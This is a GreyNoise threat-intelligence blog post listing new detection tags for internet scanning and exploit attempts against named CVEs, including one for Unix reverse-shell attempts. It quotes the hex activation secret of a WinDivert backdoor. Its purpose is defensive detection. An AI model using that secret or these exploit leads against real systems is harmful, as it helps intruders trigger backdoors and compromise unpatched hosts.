While you will be able to find a comprehensive list of all the tags created since our last round up below, the GreyNoise Research team wanted to highlight some interesting tags.
Apache Log4j RCE Attempt [Intention: Malicious]
Self Explanatory.
Backdoor Connection Attempt via WinDivert [Intention: Malicious]
This tag was created this week as a result of the research done by the Avast team.
DNS Over HTTPS Scanner [Intention: Unknown]
Relatively new technology. It's interesting because “why would you scan the internet for that?” and there's no clear motive - that we can tell.
Microsoft HTTP.sys RCE Attempt [Intention: Malicious]
Critical vulnerability in MS Windows’ http.sys kernel module.
VMware vCenter SSRF Attempt [Intention: Malicious]
Widely popular server management software.
Zoho ManageEngine ServiceDesk Plus msiexec RCE Attempt [Intention: Malicious]
A critical vulnerability in a popular help desk platform.
It has been a while since we have last published a Tag Round Up! If these are helpful to you, or you have suggestions on what you would like to see, please reach out to community@greynoise.io
Antiwork Port 9100 Print Request [Intention: Unknown]
This IP address has been observed sending distinct RAW TCP/IP requests to network printers. References:
Backdoor Connection Attempt via WinDivert [Intention: Malicious]
This IP address has been observed attempting to send a known activation secret "CB5766F7436E22509381CA605B98685C8966F16B" for a malicious backdoor utilizing WinDivert. References:
DNS Over HTTPS Scanner [Intention: Unknown]
This IP address has been observed attempting to scan for responses to DNS over HTTPS (DoH) requests. References:
Generic Unix Reverse Shell Attempt [Intention: Malicious]
This IP address has been observed attempting to spawn a generic Unix reverse shell via the web request. References:
iKettle Crawler [Intention: Unknown]
This IP address has been observed crawling the Internet and attempting to discover iKettle devices. References:
InfluxDB Crawler [Intention: Unknown]
This IP address has been observed crawling the Internet and attempting to discover InfluxDB instances. References:
IRC Crawler [Intention: Unknown]
This IP address has been observed sending NICK and USER commands used to register a connection with an IRC server. References:
iSCSI Crawler [Intention: Unknown]
This IP address has been observed crawling the Internet and attempting to discover hosts that respond to iSCSI login requests. References:
Jira REST API Crawler [Intention: Unknown]
This IP address has been observed attempting to enumerate Jira instances. References:
Apache Druid RCE Attempt [Intention: Malicious]
CVE-2021-25646
This IP address has been observed attempting to exploit CVE-2021-25646, a remote command execution in Apache Druid v0.20.0 and earlier References:
Apache Log4j RCE Attempt [Intention: Malicious]
CVE-2021-44228 | CVE-2021-45046
This IP address has been observed attempting to exploit CVE-2021-44228 and CVE-2021-45046, a remote code execution vulnerability in the popular Java logging library Apache Log4j. CVE-2021-44228 affects versions 2.14.1 and earlier, CVE-2021-45046 affects versions 2.15.0 and earlier. References:
CentOS Web Panel RCE Attempt [Intention: Malicious]
This IP address has been observed attempting to exploit a vulnerability in CentOS Web Panel which can lead to elevated privileges and remote code execution. References:
FHEM LFI [Intention: Malicious]
CVE-2020-19360
This IP address has been observed observed attempting to exploit CVE-2020-19360, a local file inclusion vulnerability in FHEM perl server. References:
GLPI SQL Injection Attempt [Intention: Malicious]
CVE-2019-10232
This IP address has been observed attempting to exploit CVE-2019-10232, an SQL injection vulnerability in GLPI service management software. References:
Grafana Path Traversal Attempt [Intention: Malicious]
CVE-2021-43798
This IP address has been observed attempting to exploit CVE-2021-43798, a path traversal and arbitrary file read in Grafana. References:
Grafana Path Traversal Check [Intention: Unknown]
CVE-2021-43798
This IP address has been observed attempting to check for the presence of CVE-2021-43798, a path traversal and arbitrary file read in Grafana. References:
HRsale LFI [Intention: Malicious]
CVE-2020-27993
This IP address has been observed observed attempting to exploit CVE-2020-27993, a local file inclusion vulnerability in HRsale. References:
Metabase LFI Attempt [Intention: Malicious]
CVE-2021-41277
This IP address has been observed attempting to exploit CVE-2021-41277, a local file inclusion vulnerability in Metabase. References:
Microsoft HTTP.sys RCE Attempt [Intention: Malicious]
CVE-2021-31166
This IP address has been observed attempting to exploit CVE-2021-31166, a remote code execution vulnerability in the Windows HTTP protocol stack. References:
Motorola Baby Monitor RCE Attempt [Intention: Malicious]
CVE-2021-3577
This IP address has been observed attempting to exploit CVE-2021-3577, a remote command execution vulnerability in Motorola Halo+ baby monitors. References:
NodeBB API Token Bypass Attempt [Intention: Malicious]
CVE-2021-43786
This IP address has been observed attempting to exploit CVE-2021-43786, an unintentionally allowed master token access which can lead to remote code execution. References:
October CMS Password Reset Scanner [Intention: Malicious]
CVE-2021-32648
This IP address has been observed attempting to exploit CVE-2021-32648, a password reset vulnerability in October CMS. References:
TP-Link TL-WR840N RCE Attempt [Intention: Malicious]
CVE-2021-41653
This IP address has been observed attempting to exploit CVE-2021-41653, a remote command execution vulnerability in TP-Link TL-WR840N EU v5. References:
VMware vCenter Arbitrary File Read Attempt [Intention: Malicious]
CVE-2021-21980
This IP address has been observed attempting to exploit CVE-2021-21980, an unauthorized arbitrary file read vulnerability in vSphere Web Client. References:
VMware vCenter SSRF Attempt [Intention: Malicious]
CVE-2021-22049
This IP address has been observed attempting to exploit CVE-2021-22049, a server side request forgery vulnerability in vSphere Web Client. References:
WebSVN 2.6.0 RCE CVE-2021-32305 [Intention: Malicious]
CVE-2021-32305
This IP address has been observed scanning the Internet for devices vulnerable to CVE-2021-32305, a remote code execution vulnerability in WebSVN which utilizes a shell metacharacter in the search parameter. References:
Zimbra Collaboration Suite XXE Attempt [Intention: Malicious]
CVE-2019-9670
This IP address has been observed attempting to exploit CVE-2019-9670, an XXE vulnerability in Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10. References:
Zoho ManageEngine ServiceDesk Plus msiexec RCE Attempt [Intention: Malicious]
CVE-2021-44077
This IP address has been observed attempting to exploit CVE-2021-44077, a remote command execution vulnerability in Zoho ManageEngine ServiceDesk Plus before 11306, ServiceDesk Plus MSP before 10530, and SupportCenter Plus before 11014. References:
